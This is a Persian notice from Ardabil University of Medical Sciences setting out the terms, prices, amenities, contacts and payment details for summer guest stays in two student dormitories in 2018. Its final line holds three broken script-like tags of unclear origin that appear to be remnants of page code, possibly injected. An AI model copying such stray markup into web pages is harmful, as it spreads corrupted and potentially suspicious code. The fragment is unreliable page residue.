معاونت دانشجویی فرهنگی دانشگاه علوم پزشکی اردبیل

مدیریت امور دانشجویی

شرایط اسکان میهمانان تابستانی سال ۹۷ در خوابگاه دانشجویی اردبیل

…………………………………………………………………………………………………………………

• شروع زمان اسکان از تاریخ ۲۸/۴/۹۷ لغایت ۱۵/۶/۹۷ می باشد.
  • هزینه اقامات ( خوابگاه بسیج ) برای یک شب ( سوئیا مجزا ) به مساحت ۷۰ متر مربع مبلغ ۸۰۰۰۰۰ ریال
  • ( ساختمان  ۴ طبقه – فاقد آسانسور – دارای حیاط برای پارک خودرو ).
  • هزینه اقامت ( خوابگاه سبلان ) برای یک شب ( سوئیت مجزا ) به مساحت ۷۰ متر مربع مبلع ۷۵۰۰۰۰ ریال
  • ( ساختمان ۴ طبقه – فاقد آسانسور – فاقد پارکینگ .
  • مبلغ فوق برای ۵ نفر و به ازای هر نفر اشافه ، هر شب مبلغ ۱۰۰۰۰۰ ریال اخذ خواهد شد.
  • هر سوئیت مجهز به تخت خواب – تشک – میز و صندلی – یحچال – جاکفشی و دارای سرویس بهداشتی ، حمام و دارای آشپزخانه و اجاق گاز اختصاصی و دو خوابه می باشد.
  • لوازم شخصی از قبیل پتو و سرویس پخت و پز بر عهده میهمان است.
  • نمازخانه خوابگاه دارای تلویزیون بوده و سوئیتها به طور اختصاصی فاقد تلویزیون می باشند.
  • این مدیریت صرفاً از نظر اسکان پذیرش دارد و فاقد تغذیه و سرویس ایاب و ذهاب می باشد.

شمره تماس برای رزرو : ۰۹۱۴۷۰۰۵۴۱۹ آقای غضنفری ( مسئول پذیرش و اسکان )

نشانی : ۱) اردبیل – میدان بسیج – پشت سرپرستی بانک ملت – کوچه شهید اطهری – پلاک ۱۸ – خوابگاه دانشجویی بسیج –

شماره تماس : ۳۳۷۳۰۰۶۲ – ۰۴۵

۲) اردبیل – فاز ۲ شهرک سبلان – خیابان فلسطین – روبروی بانک کشاورزی – جنب پلاسکو – خوابگاه دانشجویی سبلان – شماره تماس ۳۳۵۱۸۹۸۳ – ۰۴۵

۳- اطلاعات بیشتر در سایت http //mefda.ir/service/universities/ardabil

شرایط اسکان :

• *** جهت رزرو و اطلاع از وجود سوئیت خالی در زمان مورد نظر همکاران لازم است قبل از هرگونه اقدام با شماره تلفن همراه فوق در ساعات اداری تماس حاصل فرمایند.
  • ** ظرفیت لحاظ شده پذیرش برای هر سوئیت ۵ نفر می باشد.
  • – ** واریز هزینه اسکان به شماره حساب ۴۳۵۶۱۸۲۴۹۰ به نام خوابگاه مشارکتی دانشگاه علوم پزشکی اردبیل – نزد بانک ملت – شعبه مبارزان .
  • – ** همراه داشتن کارت شناسایی جهت تحویل به مسئول پذیرش تا پایان اقامت ضروری است.
  • ** در صورت واریز هرگونه وجهی بع حساب فوق و انصراف از اسکان ، هیچگونه وجهی عودت داده نخواهد شد.
  • ** تکمیل و امضاء فرم تقاضا ( پایین همین برگه ) و ارسال تصویر این برگه به همراه فیش واریزی و معرفی نامه کتبی دانشگاه مربوطه به پیام رسان شماره همراه ۰۹۱۴۷۰۰۵۴۱۹ آقای غضنفری ( مسئول پذیرش و اسکان )
  • ** ساعت تحویل سوئیت از ۱۴ لغایت ۲۲ و ساعت تخلیع ۹ صبح می باشد.
  • ** ارائه اصل فیش وریزی هنگامن مراجعه به خوابگاه الزامیسیت.

** در صورت پرداخت نقدی ، قبل از اسکان هزینه مربوطه در روز پذیرش اخذ خواهد شد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>